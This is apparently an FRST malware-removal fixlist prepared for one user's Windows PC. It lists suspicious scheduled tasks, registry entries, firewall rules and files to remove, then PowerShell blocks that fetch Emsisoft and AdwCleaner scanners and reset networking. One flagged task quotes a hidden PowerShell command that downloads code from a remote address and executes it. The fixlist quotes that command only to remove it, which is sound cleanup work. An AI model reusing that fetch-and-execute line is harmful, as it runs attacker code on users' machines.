content copied
content
Start::
CreateRestorePoint:
CloseProcesses:
2026-04-26 12:36 - 2026-04-26 12:36 - 000002666 _____ C:\WINDOWS\system32\Tasks\Media Player Service
2026-04-24 20:48 - 2026-04-24 20:48 - 000000000 ____D C:\Users\Conway\AppData\Local\Yandex
2026-04-24 14:17 - 2026-04-24 14:17 - 000000000 ____D C:\Users\Conway\AppData\Roaming\RenPy
CustomCLSID: HKU\S-1-5-21-2392716304-2438942924-2019435442-1001_Classes\CLSID\{2cd17d3d-8f37-6dad-c814-c56850a6de24}\localserver32 -> "C:\ProgramData\Lenovo\Udc\Hosts\24.9.1.3\x64\MessagingPlugin.exe" -ToastActivated => No File
CustomCLSID: HKU\S-1-5-21-2392716304-2438942924-2019435442-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32 -> => No File
ShellIconOverlayIdentifiers: [ LenovoAINowOverlayIcon] -> {4B48C68B-80D6-40FB-B4D1-63C19130EC75} => C:\Program Files\Lenovo\Lenovo AI Now\OverlayIcon.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [5126]
FirewallRules: [{A3A6CF0B-652E-4673-9278-F900EC1F0E5C}] => (Block) C:\Program Files (x86)\Overwolf\0.296.0.23\OverwolfBrowser.exe => No File
FirewallRules: [{24391D85-9341-41B2-B5BA-64C984F35E63}] => (Block) C:\Program Files (x86)\Overwolf\0.296.0.23\OverwolfBrowser.exe => No File
FirewallRules: [{1FF38ED5-0FBA-4409-9F7F-347F9CCCF0F0}] => (Allow) C:\Program Files (x86)\Overwolf\0.296.0.23\OverwolfBrowser.exe => No File
FirewallRules: [{182AB96C-4144-450A-80F4-CDF8C79D02FE}] => (Allow) C:\Program Files (x86)\Overwolf\0.296.0.23\OverwolfBrowser.exe => No File
FirewallRules: [{FE1C7F79-BA32-4B92-AE3B-0C82C657C1D0}] => (Allow) C:\Users\Conway\AppData\Roaming\Hytale\install\pre-release\package\jre\latest\bin\java.exe => No File
FirewallRules: [{F182B7F7-B726-4041-B916-A2882402B6A4}] => (Allow) C:\Users\Conway\AppData\Roaming\Hytale\install\pre-release\package\jre\latest\bin\java.exe => No File
FirewallRules: [{A27B6FA2-2AF4-4504-8279-6C96820EDE88}] => (Allow) C:\Users\Conway\AppData\Roaming\Hytale\install\pre-release\package\game\latest\Client\HytaleClient.exe => No File
FirewallRules: [{1163C493-867B-41E7-9249-C24A4F099982}] => (Allow) C:\Users\Conway\AppData\Roaming\Hytale\install\pre-release\package\game\latest\Client\HytaleClient.exe => No File
FirewallRules: [{C5745137-7E0D-4CEF-8271-2C573305A9C1}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{8AA5CCCE-112A-4793-9788-3E2838F47EED}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
2026-04-26 13:31 - 2025-10-11 11:47 - 000027949 _____ C:\Users\Conway\AppData\LocalLow\d50a4a167fb17467045ea40b8ca1a54a5af4c92056318410bcccd799a412aa87
2026-01-19 15:21 - 2026-01-19 15:21 - 000000048 ____R () C:\Users\Conway\AppData\Local\0119AC2FC90D95AC063B177717B7B3B6
2025-09-17 23:21 - 2025-09-17 23:21 - 000000048 ____R () C:\Users\Conway\AppData\Local\DB0A5245D71083BAF12FBD1A6E871F38
HKLM\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
Task: {9EE24C95-B1C8-48B9-BF8F-A6F14761E312} - System32\Tasks\Google Compatibility Appraiser CL_NCL_8a3caad3254b3327 => C:\WINDOWS\system32\conhost.exe [1003520 2026-04-26] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION
Task: {E950E225-EF24-4EF8-8C80-D6E37A4D1879} - System32\Tasks\Media Player Service => C:\Users\Conway\rr.exe\MediaPlayerService.exe (No File) <==== ATTENTION
2026-04-26 12:36 - 2026-04-26 12:36 - 000003592 _____ C:\WINDOWS\system32\Tasks\Google Compatibility Appraiser CL_NCL_8a3caad3254b3327
2026-04-24 14:17 - 2026-04-24 14:17 - 000000000 ____D C:\Users\Conway\AppData\Roaming\ConnectorDbg_i686
StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from the Emsisoft's official site, updates it, scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUP's in 1) system memory 2) important folders as documentation says
# It will scan in compressed archives, in mail archives, in NTFS alternate data streams and use cloud requests
# ---
# You can use argument "/delete" to delete found objects including references but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan but that may take longer than what FRST can handle.
# You can use argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) {
New-Item -Path $frstPath -ItemType Directory -Force | Out-Null
}
if (-not (Test-Path $extractPath)) {
New-Item -Path $extractPath -ItemType Directory -Force | Out-Null
}
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe")) { Start-Sleep -Milliseconds 1000 }
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if ([Environment]::Is64BitOperatingSystem) {
$a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
$a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:
StartPowerShell:
# Downloads newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log in console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects, add an argument /preinstalled to the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:
CMD: netsh int ip reset
CMD: netsh int ipv6 reset
CMD: ipconfig /flushDNS
CMD: netsh winsock reset catalog
C:\Users\CurrentUserName\AppData\Local\Temp\*
C:\Windows\Temp\*
EmptyTemp:
End::
Warning
Executing a Fixlist on the wrong system may permanently damage it. Continue only if this link was meant for you.
To view the content, acknowledge this warning.